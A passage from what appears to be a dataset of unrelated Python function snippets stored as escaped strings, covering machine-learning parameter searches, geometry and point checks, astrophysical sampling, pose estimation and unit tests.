index_dict[\"validation\"][1]],\n t=t, gamma=parameter)\n\n # add the mean absolute error on validation set to the list\n mae_list.append(mean_absolute_error(\n np.exp(y[\n index_dict[\"validation\"][0]:\n index_dict[\"validation\"][1]]),\n np.exp(y_pred)))\n\n # add average mae for parameter to dict\n average_mae_per_par[\"{}\".format(parameter)] = np.mean(mae_list)\n\n # return parameter with average mae\n\n return min(average_mae_per_par, key=average_mae_per_par.get), \\\n average_mae_per_par", "def iterative_function_vect(points, numLines, numIter, e_tilde, gamma_tilde, beta_tilde):\n \n numPoints = len(points)\n \n # Randomly sample pairs and get the corresponding rho and theta parameters for a line fitted to the pair: \n # Returns a list of tuples - Each tuple has the rho and theta parameters for the line: \n lines ,idxs = info_rand_sample_fit_lines(points, numLines)\n \n \n # Compute normal distance of each point from each line: Store in a 2-D numpy array: \n # Points along 1st axis - Rows - axis= 0\n # Lines along 2nd axis - Columns - axis=1\n \n # Initialize the 2-D array: \n normDist = np.zeros((numPoints, numLines))\n \n \n # Indices for the 2-D array: \n j,k = 0,0\n \n # Loop through points:\n for point in points: \n \n k = 0\n \n # Loop through the lines: \n for line in lines:\n \n normDist[j,k] = get_normal_dist(line,point)\n \n # Increment the column (line) index:\n k+=1\n \n \n #Increment the row (point) index\n j += 1\n \n # Transform the Normal Distance matrix to the Probability of Membership matrix: \n Pr_C = log_dec(normDist,e_tilde)\n \n \n ## Iteratively refine estimates of Prob of Validity - Points and Lines: \n iterCount = 0\n \n # Initialize Probability of Validity of points and lines: \n initProb =1\n Pr_A = initProb*np.ones((numPoints,1))\n Pr_V = np.zeros((numLines,1))\n \n \n # Initialize gamma and beta: Fractions of valid points and lines respectively: \n gamma = np.zeros_like(Pr_V)\n beta = np.zeros_like(Pr_A)\n \n \n while iterCount < numIter: \n \n # For each line: Compute Gamma:\n \n # Compute expected fraction of valid points: \n gamma = np.dot(Pr_A.T, Pr_C)/np.sum(Pr_A) # Hope the broadcasting works here:\n \n \n # Compute Probability of Validity: \n Pr_V = log_inc(gamma, gamma_tilde) \n \n \n # For each point: Compute beta:\n \n # Compute expected fraction of valid lines in which it is a member: \n beta = np.dot(Pr_C, Pr_V.T)/np.sum(Pr_V)\n \n \n # Compute Probability of Validity: \n Pr_A = log_inc(beta, beta_tilde)\n \n \n iterCount +=1\n \n # Sort the lines according to Probability of Validity:\n idx_sort = np.argsort(Pr_V, axis=1)\n \n print (\" The equations of candidate lines and their probability of validity are: \") \n\n \n for idx in idx_sort: \n print (lines[int(idx)] , end = '-- >')\n print (Pr_V[idx])\n \n return lines, Pr_A, Pr_V", "def check_point_update(self):\n self.cp_count += 1\n\n if len(self.cases) > self.nyquist:\n \"\"\"\n Recalculates nyquist, releases cases and updates model (merges graphs)\n \"\"\"\n self.release_cases_from_memory()\n if self.check_point_cases > 5:\n self.nyquist = self.check_point_cases * 2\n\n check_point_graph = initialize_graph(nx.DiGraph(), self.cases)\n self.process_model_graph = merge_graphs(self.process_model_graph, check_point_graph)\n\n self.check_point_cases = 0", "def _check_deep_network_params(X: np.ndarray, y: np.ndarray):\n pass", "def part_one(test_data, train_data):\n print \"Part 1.1\"\n range_k = range(1,71, 2)\n train_acc = []\n test_acc = []\n cv_acc = []\n train_neighbors_dists = knn_algo(train_data, train_data)\n test_neighbors_dists = knn_algo(test_data, train_data)\n cv_dists = knn_algo_cross_validate(train_data)\n\n for k in range_k:\n train_neighbors = find_k(train_neighbors_dists, k)\n train_err = (calculate_error(train_neighbors))\n\n test_neighbors = find_k(test_neighbors_dists, k)\n test_err = (calculate_error(test_neighbors))\n\n cv_neighbors = find_k(cv_dists, k)\n cv_err = (calculate_error(cv_neighbors))\n\n ### TODO: cross validation here\n train_acc.append(train_err)\n test_acc.append(test_err)\n cv_acc.append(cv_err)\n\n # part 1.1\n print \"K range: \"\n print range_k\n print \"Train acc: \"\n print train_acc\n print \"Test acc: \"\n print test_acc\n print \"CV acc: \"\n print cv_acc\n\n print \"Part 1.2: \"\n # part 1.2\n plt.plot(range_k, train_acc, label = \"train\")\n plt.plot(range_k, test_acc, label = \"test\")\n plt.plot(range_k, cv_acc, label = \"CV\")\n plt.ylabel(\"percent error\")\n plt.xlabel(\"k\")\n plt.legend()\n plt.show()\n return (range_k, train_acc, test_acc, cv_acc)", "def test_penalty_compute(self):\n objective = {'G': numpy.zeros((9)),\n 'H': numpy.diag((1,)*9),\n 'X': 1}\n for penalty in self.penalties:\n result = penalty.compute([1]*self.np, objective)\n assert isinstance(result,tuple)\n # more tests go here", "def _check_run(self, axis):\n if (self.x_traj, self.y_traj)[axis] is None:\n if (self.inverse_x_traj, self.inverse_y_traj)[axis] is None:\n raise Exception('The algorithm has not been run.')\n else:\n if self.params['print_info']:\n print('Warning: you are using the opposite score. It can contain errors if any score is a zero below threshold.')\n return (self.inverse_x_traj, self.inverse_y_traj)[axis], (self.inverse_x_ranking, self.inverse_y_ranking)[axis]\n return (self.x_traj, self.y_traj)[axis], (self.x_ranking, self.y_ranking)[axis]", "def par_test_2(self):\n\n for i in range(4):\n self.XYZ_par_factor.setMaxDepth(i)\n self.XYZ_par_factor.setMaxDepth(i)\n\n res = [\n self.XYZ_factor.mult(self.scalar),\n self.XYZ_factor.mult(self.scalarf),\n self.scalarf.mult(self.XYZ_factor),\n ]\n\n par_res = [\n self.XYZ_par_factor.mult(self.scalar),\n self.XYZ_par_factor.mult(self.par_scalarf),\n self.par_scalarf.mult(self.XYZ_par_factor),\n ]\n\n for i, ele in enumerate(res):\n assert (\n ele.rand_vars == par_res[i].rand_vars\n and ele.values == par_res[i].values\n )", "def test_check_point():\n board = Board(640, 640, 8)\n board.start_game()\n assert board.check_point(board.SPACE_SIZE/2, board.SPACE_SIZE/2) is not None\n assert board.check_point(0, 0) is None", "def _para_fit(self, X):\n data = self.convert_input(X)\n # This is just a cheap way to approximate the actual value\n unique_elements = set(data.elements)\n pairs = get_element_pairs(data.elements)\n return unique_elements, pairs", "def _compute_gps_parallel(dataset, number_gp, t_min, t_max, output_root,\n number_processes, gp_dim, **kwargs):\n p = Pool(number_processes, maxtasksperchild=10)\n\n # Pool and map can only really work with single-valued functions\n partial_gp = partial(_compute_gp_all_passbands, dataset=dataset,\n number_gp=number_gp, t_min=t_min, t_max=t_max,\n output_root=output_root, gp_dim=gp_dim, **kwargs)\n\n dataset_gps = p.map(partial_gp, dataset.object_names, chunksize=10)\n p.close()\n\n for i in range(len(dataset.object_names)):\n obj = dataset.object_names[i]\n obj_gps = dataset_gps[i]\n dataset.models[obj] = obj_gps\n print('Models fitted with the Gaussian Processes values.')", "def input_check(self):\n\n if self.species == 'He': assert self.line_model == 'voigt'\n n_upper_range, e_dens_range, temp_range, b_field_range = get_param_ranges(self.line_model)\n\n if np.isnan(n_upper_range).sum() <= 1:\n assert (self.n_upper in range(n_upper_range[0], n_upper_range[1]))\n if np.isnan(e_dens_range).sum() <= 1:\n assert (e_dens_range[0] <= self.e_dens <= e_dens_range[1])\n if np.isnan(temp_range).sum() <= 1:\n assert (temp_range[0] <= self.temp <= temp_range[1])\n if np.isnan(b_field_range).sum() <= 1:\n assert (b_field_range[0] <= self.b_field <= b_field_range[1])", "def checkPointValidity(self, point: Tuple[float, float]) -> bool:\n neighbor = self.kdtree.search_nn(point)\n if not neighbor:\n self.kdtree.add(point)\n return True\n if neighbor[1] <= self.MIN_POINTS_DIST:\n return False\n else:\n self.kdtree.add(point)\n return True", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n\n super().check_params(X)", "def _process(self, x: np.ndarray, y: np.ndarray) -> None:\n\n if (((self.support_vectors - x) ** 2).sum(axis=1) ** 0.5 < self.ERR).any():\n return\n\n self._add_support_vectors(x, y)\n\n if y[0] == 1:\n i = self.support_vectors.shape[0] - 1\n j = self._find_min_gradient_id()\n\n else:\n j = self.support_vectors.shape[0] - 1\n i = self._find_max_gradient_id()\n\n if not self._is_violating_pair(i, j):\n return\n\n self._update_parameters(i=i, j=j)", "def isinsidepointXY(x,p):\n \n return dist(x,p) < epsilon", "def check_point(point,points):\n if point in points:\n return True\n else:\n return False", "def read_data_split_and_search():\n\n\n\n dataReader = Movielens10MReader()\n dataset = dataReader.load_data()\n\n URM_train, URM_test = split_train_in_two_percentage_global_sample(dataset.get_URM_all(), train_percentage = 0.80)\n URM_train, URM_validation = split_train_in_two_percentage_global_sample(URM_train, train_percentage = 0.80)\n\n output_folder_path = \"result_experiments/\"\n\n\n # If directory does not exist, create\n if not os.path.exists(output_folder_path):\n os.makedirs(output_folder_path)\n\n\n\n\n\n\n\n collaborative_algorithm_list = [\n Random,\n TopPop,\n P3alphaRecommender,\n RP3betaRecommender,\n ItemKNNCFRecommender,\n UserKNNCFRecommender,\n MatrixFactorization_BPR_Cython,\n MatrixFactorization_FunkSVD_Cython,\n PureSVDRecommender,\n SLIM_BPR_Cython,\n SLIMElasticNetRecommender\n ]\n\n\n\n\n from Base.Evaluation.Evaluator import EvaluatorHoldout\n\n evaluator_validation = EvaluatorHoldout(URM_validation, cutoff_list=[5])\n evaluator_test = EvaluatorHoldout(URM_test, cutoff_list=[5, 10])\n\n\n runParameterSearch_Collaborative_partial = partial(runParameterSearch_Collaborative,\n URM_train = URM_train,\n metric_to_optimize = \"MAP\",\n n_cases = 10,\n evaluator_validation_earlystopping = evaluator_validation,\n evaluator_validation = evaluator_validation,\n evaluator_test = evaluator_test,\n output_folder_path = output_folder_path,\n similarity_type_list = [\"cosine\"],\n parallelizeKNN = False)\n\n\n\n\n\n pool = multiprocessing.Pool(processes=int(multiprocessing.cpu_count()), maxtasksperchild=1)\n pool.map(runParameterSearch_Collaborative_partial, collaborative_algorithm_list)\n\n #\n #\n # for recommender_class in collaborative_algorithm_list:\n #\n # try:\n #\n # runParameterSearch_Collaborative_partial(recommender_class)\n #\n # except Exception as e:\n #\n # print(\"On recommender {} Exception {}\".format(recommender_class, str(e)))\n # traceback.print_exc()\n #", "def test_penalty_compute(self):\n objective = {'G': numpy.zeros((9)),\n 'H': numpy.diag((1,)*9),\n 'X': 1}\n for penalty in self.penalties:\n result=penalty.compute([1]*self.np, objective)\n self.assertEqual(tuple, type(result))\n # more tests go here", "def sample_all_planck_points(all_ids, adaptivep0 = True, planck_tqu_cursor = None, planck_cov_cursor = None, region = \"SC_241\", verbose = False, tol=1E-5, sampletype = \"mean_bayes\", testproj=False):\n if testproj:\n all_naive_p = np.zeros(len(all_ids))\n all_naive_psi = np.zeros(len(all_ids))\n else:\n all_pMB = np.zeros(len(all_ids))\n all_psiMB = np.zeros(len(all_ids))\n\n if planck_tqu_cursor is None:\n print(\"Loading default planck_tqu_cursor because it was not provided\")\n planck_tqu_db = sqlite3.connect(\"planck_TQU_gal_2048_db.sqlite\")\n planck_tqu_cursor = planck_tqu_db.cursor()\n \n if planck_cov_cursor is None:\n print(\"Loading default planck_cov_cursor because it was not provided\")\n planck_cov_db = sqlite3.connect(\"planck_cov_gal_2048_db.sqlite\")\n planck_cov_cursor = planck_cov_db.cursor()\n\n # Get p0 and psi0 sampling grids\n p0_all = np.linspace(0, 1, 165)\n psi0_all = np.linspace(0, np.pi, 165, endpoint=False) # don't count both 0 and pi\n\n update_progress(0.0)\n for i, _id in enumerate(all_ids):\n #if _id[0] in [3400757, 793551, 2447655]:\n posterior_obj = PlanckPosterior(_id[0], planck_tqu_cursor, planck_cov_cursor, p0_all, psi0_all, adaptivep0 = adaptivep0)\n #print(\"for id {}, p0 grid is {}\".format(_id, posterior_obj.sample_p0))\n #print(\"for id {}, pmeas is {}, psimeas is {}, psi naive is {}\".format(_id, posterior_obj.pmeas, posterior_obj.psimeas, posterior_obj.naive_psi))\n #print(\"for id {}, likelihood[0, 1] = {}\".format(_id, posterior_obj.posterior[0, 1]))\n #print(p0_all[0], psi0_all[1]) \n #lnlikeout = lnlikelihood(_id[0], planck_tqu_cursor, planck_cov_cursor, p0_all[0], psi0_all[1])\n #print(\"for id {}, lnlikelihood[0, 1] = {}\".format(_id, lnlikeout[0]))\n #print(np.exp(lnlikeout[0]))\n \n if testproj:\n all_naive_p[i] = posterior_obj.pmeas\n all_naive_psi[i] = posterior_obj.psimeas \n else:\n if sampletype is \"mean_bayes\":\n all_pMB[i], all_psiMB[i] = mean_bayesian_posterior(posterior_obj, center = \"naive\", verbose = verbose, tol=tol)\n elif sampletype is \"MAP\":\n all_pMB[i], all_psiMB[i] = maximum_a_posteriori(posterior_obj, verbose = verbose)\n if verbose is True:\n print(\"for id {}, num {}, I get pMB {} and psiMB {}\".format(_id, i, all_pMB[i], all_psiMB[i]))\n\n update_progress((i+1.0)/len(all_ids), message='Sampling: ', final_message='Finished Sampling: ')\n \n if testproj:\n return all_naive_p, all_naive_psi\n else:\n return all_pMB, all_psiMB", "def check_parameters(args):\n inference_algorithm = args[\"inference_algorithm\"]\n combination_algorithm = args[\"combination_algorithm\"]\n measures = args[\"measures\"]\n prior = args[\"prior\"]\n inverse_dynamics_model_checkpoint = args[\"inverse_dynamics_model_checkpoint\"]\n\n check_in(\n \"inference_algorithm\",\n inference_algorithm,\n [\n \"rlsp\",\n \"latent_rlsp\",\n \"latent_rlsp_ablation\",\n \"sampling\",\n \"deviation\",\n \"reachability\",\n \"spec\",\n ],\n )\n check_in(\n \"combination_algorithm\",\n combination_algorithm,\n (\"additive\", \"bayesian\", \"latent_vi\", \"latent_ppo\"),\n )\n check_in(\"prior\", prior, [\"gaussian\", \"laplace\", \"uniform\"])\n\n for i, measure in enumerate(measures):\n check_in(\n \"measure {}\".format(i),\n measure,\n [\"inferred_reward\", \"true_reward\", \"final_reward\", \"model_training_error\"],\n )\n\n if combination_algorithm == \"bayesian\":\n check_in(\"inference_algorithm\", inference_algorithm, [\"rlsp\", \"sampling\"])\n\n if inference_algorithm == \"latent_rlsp\":\n check_not_none(\n \"inverse_dynamics_model_checkpoint\", inverse_dynamics_model_checkpoint\n )\n\n if (\n combination_algorithm.startswith(\"latent\")\n and inference_algorithm != \"latent_rlsp\"\n ):\n raise ValueError(\n \"combination_algorithm 'latent' should only be used with 'latent_rlsp'\"\n )", "def voxelize_points(points, pc_bbox_center, voxel_resolution, num_voxels_per_dim, pc_center_in_voxel_grid):\n\n # this is the voxel grid we are going to return\n voxel_grid = np.zeros((num_voxels_per_dim,\n num_voxels_per_dim,\n num_voxels_per_dim), dtype=np.bool)\n\n # take the points and convert them from meters to voxel space coords\n centered_scaled_points = np.floor(\n (points - np.array(pc_bbox_center) + np.array(\n pc_center_in_voxel_grid) * voxel_resolution) / voxel_resolution)\n\n # remove any points that are beyond the area that falls in our voxel grid\n mask = centered_scaled_points.max(axis=1) < num_voxels_per_dim\n centered_scaled_points = centered_scaled_points[mask]\n\n # if we don't have any more points that fall within our voxel grid\n # return an empty grid\n if centered_scaled_points.shape[0] == 0:\n return voxel_grid\n\n # remove any points that are outside of the region we are voxelizing\n # as they are to small.\n mask = centered_scaled_points.min(axis=1) > 0\n centered_scaled_points = centered_scaled_points[mask]\n\n # if we don't have any more points that fall within our voxel grid,\n # return an empty grid\n if centered_scaled_points.shape[0] == 0:\n return voxel_grid\n\n # treat our remaining points as ints, since we are already in voxel coordinate space.\n # this points shoule be things like (5, 6, 7) which represent indices in the voxel grid.\n csp_int = centered_scaled_points.astype(int)\n\n # create a mask from our set of points.\n mask = (csp_int[:, 0], csp_int[:, 1], csp_int[:, 2])\n\n # apply the mask to our voxel grid setting voxel that had points in them to be occupied\n voxel_grid[mask] = 1\n\n return voxel_grid", "def test_get_points_to_estimate(self):\r\n # Ref in range.\r\n obs = self.estimator1._get_points_to_estimate(4, 1, 5, 4)\r\n self.assertEqual(obs, [1, 2, 3, 4, 5])\r\n\r\n # Ref not in range.\r\n obs = self.estimator1._get_points_to_estimate(4, 5, 10, 2)\r\n self.assertEqual(obs, [4, 5, 7, 9])\r\n\r\n # stop not supplied.\r\n obs = self.estimator1._get_points_to_estimate(5, 5, num_steps=2)\r\n self.assertEqual(obs, [5, 17, 29])", "def __check1d(self, npts, dmax):\n print 'Checking %d-point rule:' % npts\n xi, wt = q1db.qLoc(npts)\n self.assertEqual(len(xi), len(wt))\n\n for d in range(dmax + 1):\n integral = self.integral(xi, wt, self.monomial(d))\n trueval = (float(1)/float(d + 1))\n print ' degree: %d, value: %f, true = %f' % (d, integral, trueval)\n self.assertTrue(np.abs(integral - trueval) < self.tol,\n 'degree: %d, value: %f, true = %f' % (d, integral, trueval))\n\n print '... %d-point rule: OK\\n' % npts\n\n return", "def check_point_inside(self, points):\n return all([self._domain.check_point_inside(point) for point in points])", "def point_valid(pt):\n\n cell_coords = get_cell_coords(pt)\n for idx in get_neighbours(cell_coords):\n nearby_pt = samples[idx]\n # Squared distance between or candidate point, pt, and this nearby_pt.\n distance2 = (nearby_pt[0]-pt[0])**2 + (nearby_pt[1]-pt[1])**2\n if distance2 < r**2:\n # The points are too close, so pt is not a candidate.\n return False\n # All points tested: if we're here, pt is valid\n return True", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def do_pnp(pts3d_for_pnp, pts2d_for_pnp, K, iterations=200, reprojThresh=5):\n list_pts3d_for_pnp = pts3d_for_pnp\n list_pts2d_for_pnp = pts2d_for_pnp\n pts3d_for_pnp = np.squeeze(np.array(pts3d_for_pnp))\n pts2d_for_pnp = np.expand_dims(np.squeeze(np.array(pts2d_for_pnp)), axis=1)\n num_pts = len(pts3d_for_pnp)\n\n highest_inliers = 0\n for i in range(iterations):\n pt_idxs = np.random.choice(num_pts, 6, replace=False)\n pts3 = np.array([pts3d_for_pnp[pt_idxs[i]] for i in range(len(pt_idxs))])\n pts2 = np.array([pts2d_for_pnp[pt_idxs[i]] for i in range(len(pt_idxs))])\n _, rvec, tvec = cv2.solvePnP(pts3, pts2, K, distCoeffs=np.array([]), flags=cv2.SOLVEPNP_ITERATIVE)\n R, _ = cv2.Rodrigues(rvec)\n pnp_errors, projpts, avg_err, perc_inliers = test_reproj_pnp_points(list_pts3d_for_pnp, list_pts2d_for_pnp, R, tvec, K, rep_thresh=reprojThresh)\n if highest_inliers < perc_inliers:\n highest_inliers = perc_inliers\n best_R = R\n best_tvec = tvec\n R = best_R\n tvec = best_tvec\n print('rvec:', rvec,'\\n\\ntvec:', tvec)\n\n return R, tvec", "def test_find_unused_parameters_when_unused_parameters_empty(self):\n\n class FindUnusedParamModule(nn.Module):\n def __init__(self):\n super().__init__()\n self.t0 = Task()\n self.t1 = Task()\n\n def task_parameters(self):\n return (self.t0.p, self.t1.p)\n\n def forward(self, x, rank):\n return self.t1(self.t0(x)) if rank == 0 else self.t1(x)\n\n def run_and_verify_grad(model):\n # Run forward\n output = model(8, self.rank)\n\n # The grads of all parameters should be None at this point.\n [self.assertIsNone(t_p.grad) for t_p in model.module.task_parameters()]\n\n # Run backward\n output.mean().backward()\n\n # Now locally unused parameter should have grad updated on all ranks.\n [self.assertIsNotNone(t_p.grad) for t_p in model.module.task_parameters()]\n\n process_group = self._get_process_group()\n\n # Test on CPU\n cpu_model = DistributedDataParallel(\n FindUnusedParamModule().cpu(),\n process_group=process_group,\n find_unused_parameters=True,\n )\n run_and_verify_grad(cpu_model)\n\n # Test on GPU\n device_id = gpus_for_rank(self.world_size)[self.rank][0]\n gpu_model = DistributedDataParallel(\n FindUnusedParamModule().to(device_id),\n device_ids=[device_id],\n process_group=process_group,\n find_unused_parameters=True,\n )\n run_and_verify_grad(gpu_model)", "def optimize_self(self):\n self.compute_predicate_values();\n \"\"\" Firstly,adjust the f(x) into > alpha_0; \"\"\"\n for i in range(len(self.RING_PARA_PAIR_CD)):\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]);\n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;\n for i in range(len(self.RING_PARA_PAIR_CC)):\n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>>\n # print( RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID] ); # ---------------------------------------------------------------->>>>>\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CC[i]); \n # ************** BUG 0627 **********************\n # if self.RING_PARA_PAIR_CC[i][2]<41 and self.RING_PARA_PAIR_CC[i][2]>40: # ---------------------------------------------------------------->>>>> \n # print(self.RING_PARA_PAIR_CC[i][0].VECTOR); # ---------------------------------------------------------------->>>>>\n # print(RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]); # ---------------------------------------------------------------->>>>>\n # print(self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1])); # ---------------------------------------------------------------->>>>>\n # print( np.cumprod( self.RING_PARA_PAIR_CC[i][1] - self.RING_PARA_PAIR_CC[i][0].VECTOR )[-1] ); # ---------------------------------------------------------------->>>>>\n self.RING_PARA_PAIR_CC[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CC[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CC[i][2] = self.RING_PARA_PAIR_CC[i][0].polynomial_func(self.RING_PARA_PAIR_CC[i][1]); # 更新内部ALPHA;\n \"\"\" Secondly,adjust the alpha_0 < p_min(y_n) < q_min(x_n)\"\"\" \n P_MIN = 99999999.0; Q_MIN = 99999999.0;P_MAX = 0.0;Q_MAX = 0.0;\n CD_ID = 0;CD_MIN=0;\n # 找到结论中谓词的最小多项式值\n for RING_PARA_PAIR in self.RING_PARA_PAIR_CC:\n if Q_MIN>RING_PARA_PAIR[2]: Q_MIN=RING_PARA_PAIR[2];\n # if Q_MAX<RING_PARA_PAIR[2]: Q_MAX=RING_PARA_PAIR[2];\n # 不满足小于结论最小值的那些环的TARGET_ALPHA更新; \n for RING_PARA_PAIR in self.RING_PARA_PAIR_CD:\n if P_MIN>RING_PARA_PAIR[2]: P_MIN=RING_PARA_PAIR[2];CD_MIN=CD_ID;# self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MIN;\n # if P_MAX<RING_PARA_PAIR[2]: P_MAX=RING_PARA_PAIR[2];self.RING_PARA_PAIR_CD[CD_ID][3]=-Q_MAX;\n CD_ID+=1;\n self.RING_PARA_PAIR_CD[CD_MIN][3]=-Q_MIN; \n # 优化不满足小于结论最小值的那些环 \n for i in range(len(self.RING_PARA_PAIR_CD)): \n if self.RING_PARA_PAIR_CD[i][3]!=ALPHA:\n if P_MIN>Q_MIN:\n self.adjust_to_excepted_value(self.RING_PARA_PAIR_CD[i]); \n self.RING_PARA_PAIR_CD[i][0].VECTOR = RUNNING_DATA[self.RING_PARA_PAIR_CD[i][0].WORD_ID]; # 更新内部VECTOR;\n self.RING_PARA_PAIR_CD[i][2] = self.RING_PARA_PAIR_CD[i][0].polynomial_func(self.RING_PARA_PAIR_CD[i][1]); # 更新内部ALPHA;", "def single_iteration(args):\n def single_acceptance_condition(args):\n \"\"\"checks proposal has been accepted or max iterations reached\n\n Parameters\n ----------\n args : tuple\n see loop variable in `single_iteration`\n\n Returns\n -------\n bool:\n True if proposal not accepted and number of attempts to get\n an accepted proposal not yet reached\n \"\"\"\n return np.logical_and(\n np.less(args[-2], 1),\n np.less(args[-1], max_acceptance))\n\n def single_acceptance(args):\n \"\"\"Draws a proposal, simulates and compresses, checks distance\n\n A new proposal is drawn from a truncated multivariate normal\n distribution whose mean is centred on the parameter to move and\n the covariance is set by the population. From this proposed\n parameter value a simulation is made and compressed and the\n distance from the target is calculated. If this distance is\n less than the current position then the proposal is accepted.\n\n Parameters\n ----------\n args : tuple\n see loop variable in `single_iteration`\n\n Returns\n -------\n bool:\n True if proposal not accepted and number of attempts to get\n an accepted proposal not yet reached\n\n Todo\n ----\n Parallel sampling is currently commented out\n \"\"\"\n (rng, loc, scale, summ, dis, draws, accepted,\n acceptance_counter) = args\n rng, key = jax.random.split(rng)\n proposed, summaries = self.get_samples(\n key, None, dist=tmvn(\n loc, scale, self.prior.low, self.prior.high,\n max_counter=max_samples))\n distances = np.squeeze(\n self.distance_measure(\n np.expand_dims(summaries, 0),\n target,\n F))\n # if n_parallel_simulations is not None:\n # min_distance_index = np.argmin(distances)\n # min_distance = distances[min_distance_index]\n # closer = np.less(min_distance, ϵ)\n # loc = jax.lax.cond(\n # closer,\n # lambda _ : proposed[min_distance_index],\n # lambda _ : loc,\n # None)\n # summ = jax.lax.cond(\n # closer,\n # lambda _ : summaries[min_distance_index],\n # lambda _ : summ,\n # None)\n # dis = jax.lax.cond(\n # closer,\n # lambda _ : distances[min_distance_index],\n # lambda _ : dis,\n # None)\n # iteration_draws = n_parallel_simulations \\\n # - np.isinf(distances).sum()\n # draws += iteration_draws\n # accepted = closer.sum()\n # else:\n closer = np.less(distances, np.min(dis))\n loc = jax.lax.cond(\n closer,\n lambda _: proposed,\n lambda _: loc,\n None)\n summ = jax.lax.cond(\n closer,\n lambda _: summaries,\n lambda _: summ,\n None)\n dis = jax.lax.cond(\n closer,\n lambda _: distances,\n lambda _: dis,\n None)\n iteration_draws = 1 - np.isinf(distances).sum()\n draws += iteration_draws\n accepted = closer.sum()\n return (rng, loc, scale, summ, dis, draws, accepted,\n acceptance_counter + 1)\n\n (rng, samples, summaries, distances, weighting, acceptance_reached,\n iteration_counter, total_draws) = args\n n_to_move = samples[ϵ_ind:].shape[0]\n cov = self.w_cov(samples, weighting)\n scale = np.linalg.cholesky(cov)\n rng, *keys = jax.random.split(rng, num=n_to_move + 1)\n\n results = jax.vmap(\n lambda key, loc, scale, summaries, distances, draws, accepted,\n acceptance_counter: jax.lax.while_loop(\n single_acceptance_condition,\n single_acceptance,\n (key, loc, scale, summaries, distances, draws, accepted,\n acceptance_counter)))(\n np.array(keys),\n samples[ϵ_ind:],\n np.repeat(np.expand_dims(scale, 0), n_to_move, axis=0),\n summaries[ϵ_ind:],\n distances[ϵ_ind:],\n np.zeros(n_to_move, dtype=np.int32),\n np.zeros(n_to_move, dtype=np.int32),\n np.zeros(n_to_move))\n\n weighting = jax.vmap(\n lambda proposed: (\n self.prior.prob(proposed)\n / (np.sum(weighting * tfd.MultivariateNormalTriL(\n loc=proposed,\n scale_tril=np.repeat(\n np.expand_dims(scale, 0),\n samples.shape[0],\n axis=0)).prob(proposed)))))(\n np.vstack([samples[:ϵ_ind], results[1]]))\n samples = jax.ops.index_update(\n samples,\n jax.ops.index[ϵ_ind:, :],\n results[1])\n summaries = jax.ops.index_update(\n summaries,\n jax.ops.index[ϵ_ind:, :],\n results[3])\n distances = jax.ops.index_update(\n distances,\n jax.ops.index[ϵ_ind:],\n results[4])\n sample_indices = np.argsort(distances)\n samples = samples[sample_indices]\n summaries = summaries[sample_indices]\n distances = distances[sample_indices]\n weighting = weighting[sample_indices]\n acceptance_reached = results[-2].sum() / results[-3].sum()\n return (rng, samples, summaries, distances, weighting,\n acceptance_reached, iteration_counter + 1,\n total_draws + results[-3].sum())", "def precompute_scoring():\n global volume_void_inclusion\n global attract_point_distances\n global perlin_values\n \n volume_void_inclusion = []\n for i,void in enumerate(volumes_void):\n inclusion = gh.PointInBrep(void,points_input,False)\n volume_void_inclusion.append(inclusion)\n \n attract_point_distances = []\n for i,point in enumerate(points_attractor):\n distances = gh.Division(gh.Distance(point,points_input),max_dist)\n attract_point_distances.append(distances)", "def parameter_grid_search(X, y, model, metric, transform_grid, param_grid,\n test_split_size=0.2, verbose=False, logger=None):\n print_status_message('Beginning parameter grid search...', verbose, logger)\n t0 = time.time()\n params_list = list(ParameterGrid(param_grid))\n X_train, X_eval, y_train, y_eval = train_test_split(X, y, test_size=test_split_size)\n\n for transforms in transform_grid:\n print_status_message('Transforms = {0}'.format(str(transforms)), verbose, logger)\n print_status_message('', verbose, logger)\n print_status_message('', verbose, logger)\n transforms = fit_transforms(X_train, y_train, transforms)\n X_train = apply_transforms(X_train, transforms)\n X_eval = apply_transforms(X_eval, transforms)\n\n for params in params_list:\n tsub0 = time.time()\n for param, value in params.iteritems():\n print(param + \" = \" + str(value))\n setattr(model, param, value)\n\n print_status_message('Fitting model...', verbose, logger)\n model.fit(X_train, y_train)\n\n train_score = predict_score(X_train, y_train, model, metric)\n print_status_message('Training score = {0}'.format(str(train_score)), verbose, logger)\n\n eval_score = predict_score(X_eval, y_eval, model, metric)\n print_status_message('Evaluation score = {0}'.format(str(eval_score)), verbose, logger)\n\n tsub1 = time.time()\n print_status_message('Model trained in {0:3f} s.'.format(tsub0 - tsub1), verbose, logger)\n print_status_message('', verbose, logger)\n print_status_message('', verbose, logger)\n\n t1 = time.time()\n print_status_message('Grid search complete in {0:3f} s.'.format(t0 - t1), verbose, logger)", "def check_points(nodeL, nodeR, points, city):\n A = points\n B = city\n C = nodeL\n D = nodeR\n\n d1 = (B[0] - A[0]) * (C[1] - A[1]) - (B[1] - A[1]) * (C[0] - A[0])\n d2 = (B[0] - A[0]) * (D[1] - A[1]) - (B[1] - A[1]) * (D[0] - A[0])\n\n if (d1 < 0) & (d2 < 0):\n return True\n if (d1 > 0) & (d2 > 0):\n return True\n else:\n return False", "def __call__(self, parvals, x):\n fit_logger.info('Calculating params:')\n for parname, parval, newparval in zip(self.model.parnames, self.model.parvals, parvals):\n if parval != newparval:\n 